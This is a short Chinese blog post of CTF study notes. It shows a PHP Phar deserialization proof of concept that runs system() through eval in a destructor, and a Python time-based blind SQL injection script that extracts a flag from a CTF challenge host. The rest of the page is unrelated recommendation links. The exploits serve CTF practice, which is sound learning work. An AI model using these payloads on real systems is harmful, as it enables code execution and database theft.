2022/05/28

已于 2022-05-28 19:45:52 修改
阅读量137 收藏
点赞数
分类专栏: CTF 文章标签: php
于 2022-05-28 12:10:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46241655/article/details/125016309
版权

telnet和ping的区别

ping用来检测网络连接速度
telnet用来探测指定IP的端口的端口是否开放

Phar反序列化

在Windows上测试

<?php
class Test{
    public $cmd="system('notepad');";
}
$p = new Test();
$phar = new Phar("test.phar");//后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER();?>");//设置stub
$phar->setMetadata($p);//将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test");//添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
?>

<?php
class Test{
    public $cmd;
    function __destruct()
    {
        eval($this->cmd);
    }
}
include('phar://test.phar');
?>

Dest0g3 520迎新赛

Really Easy SQL

import requests
from time import sleep
from urllib import parse

url = "http://4336862f-ec25-46da-83df-64b1d941d1ee.node4.buuoj.cn:81/"

for mid in range(1,100):
    for i in range(1,144):
        sleep(0.1)
        data = {
            'username':parse.unquote("'%%0dor%%0dif((select%%0dascii(mid((cmd),%d,1))%%0dfrom%%0dflaggg%%0dlimit%%0d0,1)=%d,benchmark(5000000,sha(1)),1)%%0dor%%0d'" % (mid, i)),
            'password':"123"}
        result = requests.post(url,data=data)
        if result.elapsed.total_seconds() > 4:
            print(chr(i))
            break
        if i > 140:
            exit("修改limit吧")
专注pwn0年
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kettle 9.2 在centos下运行时 org.pentaho.di.ui.util.EnvironmentUtils@2b0b7e5a - ERROR (version 9.2.0.0-290
05-07 1481
错误如下: 2022/05/07 16:25:38 - org.pentaho.di.ui.util.EnvironmentUtils@2b0b7e5a - ERROR (version 9.2.0.0-290, build 9.2.0.0-290 from 2021-06-02 06.36.08 by buildguy) : Could not execute command 2022/05/07 16:25:38 - org.pentaho.di.ui.util.EnvironmentUtils@2b
kettle linux部署、执行作业、crontab定时
08-19 2389
1.解压 pdi-ce-9.2.0.0-290.zip 2.拷贝C:\Users\用户 下的.kettle文件夹到linux 用户home下 3.上传数据库驱动到data-integration/lib下 忘记上传驱动报错: 2021/08/19 20:28:08 - 转换 - ERROR (version 9.2.0.0-290, build 9.2.0.0-290 from 2021-06-02 06.36.08 by buildguy) : Unable to prepare for e
jscript错误代码及相应解释大全
蝈蝈俊.net
08-21 1533
jscript错误代码及相应解释大全关键词:ASPJScript 运行时错误JScript 运行时错误是指当 JScript 脚本试图执行一个系统不能运行的动作时导致的错误。当正在运行脚本、计算变量表达式、或者正在动态分配内存时出现 JScript 运行时错误时。错误号 描述 5029 数组长度必须为一有限正整数 5030 必须赋给数组长度一个有限正数 5028 需要 Array 或 argume
斐讯 K2刷机工具,刷机包,刷后样式,刷机教程
05-08
2022/08/05 17:42 <DIR> k2p刷机 2022/05/26 14:01 111,763 PandoraBox1611_1.png 2022/05/26 14:02 121,655 PandoraBox1611_2.png 2022/06/16 15:58 108,249 udpxy-master.zip 2021/09/27 15:29 2,936 刷机.txt ...
minio RELEASE.2022-05-26T05-48-41Z Windows版含mc
07-01
minio server,windows版本含mc,minio version RELEASE.2022-05-26T05-48-41Z, mc version RELEASE.2022-05-09T04-08-26Z。吐槽官网下载太慢了
c++ 创建dll(动态库)、static lib(静态库),以及dll的相互调用 示例vs2022工程
03-10
c++ 创建dll(动态库)、static lib(静态库),以及dll的相互调用 示例vs2022工程 sln项目文件在 c++_dll_staticLib\libtest\MathTestLib 目录下 以前有小错误,更新了错误(2023-05-28)
ISO27001 ISMS体系认证文档-05正式认证
最新发布
05-29
M-28-E-2020.04 信息安全管理体系认证申请书.doc XXX2020.04 信息安全管理体系认证申请书.doc 01-内审 2022年内部审核计划.docx 2022年内审报告.docx 内审改进跟踪表.xlsx 内审末次会议.pptx 越秀集团ISO27001内审-...
2007-2022年上市公司管理层短视行为包含原始数据 参考顶刊文献含构造过程Stata代码
04-15
版),2022,42(05):63-71. [2]田利辉,王可第.“罪魁祸首”还 是“替罪羊”?——中国式融资融券与管理层短视[J].经济评论,2019(01): 106-120. [3]李世辉,伍昭悦,程序.关键审计事项与管理层短视[J].审 计研究,2022(04):...
intellij idea 中调用kettle9.2.0.0-290样例
01-13
1、kettle-password-encoder-plugins.xml这个文件放在src/main/resources/下边 2、执行main函数即可
kettle pdi-ce-9.2.0.0-290.zip(百度网盘地址含取件码)WIN+MAC+LINUX
02-17
Pentaho Data Integration(原名 kettle),业界使用最广泛的企业级开源可视化 ETL 数据清洗系统,特别适合企业数据研究人员、DBA 等,用于企业内部系统间数据集成、搭建数据仓库等,既可处理主流数据库,也能处理其他数据源,无需开发门槛,即可完成复杂的异构数据源整合与处理。 官网服务器在国外,下载非常缓慢。
springboot集成kettel 读取excel报错,错误初始化步骤[Excel输出]
云天龙,我命由我不由天!
10-22 2914
ERROR (version 9.0.0.0-423, build 9.0.0.0-423 from 2020-01-31 04.53.04 by buildguy) : 错误初始化步骤[Excel输出] 解决方案 :添加kettel中的excel依赖 <dependency> <groupId>kettle.jxl</groupId> <artifactId>jxl</artifactId> <vers
2021-11-04
HHH_____的博客
11-04 2181
kettle发送邮件失败 《数据清洗》黑马程序员编著第三章实操。 报错如下 发送邮件 - ERROR (version 9.0.0.0-423, build 9.0.0.0-423 from 2020-01-31 04.53.04 by buildguy) : Problem while sending message: javax.mail.MessagingException: Could not connect to SMTP host: smtp.qq.com, port: 465, respons
kettle 可以连接到数据库,但是表输入预览报错
m0_55601578的博客
09-14 3725
报错日志。
已解决ERROR (version 7.0.0.0-25, build 1 from 2016-11-05 15.35.36 by buildguy) : (stderr) zipfile.BadZi
努力让自己发光,对的人才能迎着光而来
03-03 8644
已解决Python zipfile.ZipFile 解压zip文件,抛出异常raise BadZipFile(“File is not a zip file”) ERROR (version 7.0.0.0-25, build 1 from 2016-11-05 15.35.36 by buildguy) : (stderr) zipfile.BadZi的正确解决方法,亲测有效!!!
macOS安装kettle时闪退的解决办法
weixin_49324263的博客
07-08 1878
正常情况下在控制台执行sh spoon.sh就成功了,会出现kettle可视化页面,但是我执行之后发生闪退,并且报了一串错误: 错误描述为: 2021/07/07 23:58:17 - Spoon - ERROR (version 9.1.0.0-324, build 9.1.0.0-324 from 2020-09-07 05.09.05 by buildguy) : 一个未预期的错误发生在Spoon: probable cause:在停止Spoon前,请先关闭其它spoon窗口! 去网上找了一些解决闪
(已解决)Kettle 转换CVS → EXCEL 错误
qq_35564086的博客
07-29 5222
报错信息如下: 2020/07/29 13:04:41 - Spoon - Running transformation using the Kettle execution engine 2020/07/29 13:04:41 - Spoon - 转换已经打开. 2020/07/29 13:04:41 - Spoon - 正在打开转换 [jobs]... 2020/07/29 13:04:41 - Spoon - 开始执行转换. 2020/07/29 13:04:42 - jobs - 为了转换解除补丁开
SpringBoot调用Kettle常见错误
小语一天
05-06 6470
场景:通过kettle工具制作表->文件导出的转换作业,由SpringBoot程序调用该产生的ktr文件 错误:无法生成导出的文件 Could not find file with URI "..." because it is a relative path, and no base URI was provided. ___ ___ ______ ...
moment.js可以格式化2022/5/28这种格式的时间吗
05-26
// 输出:"2022-05-28" ``` 在上面的代码中,我们使用了moment函数创建moment.js对象并传入了待解析的日期字符串和其对应的格式字符串"YYYY/M/D"。这个格式字符串告诉moment.js如何解析日期字符串。解析完成后,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值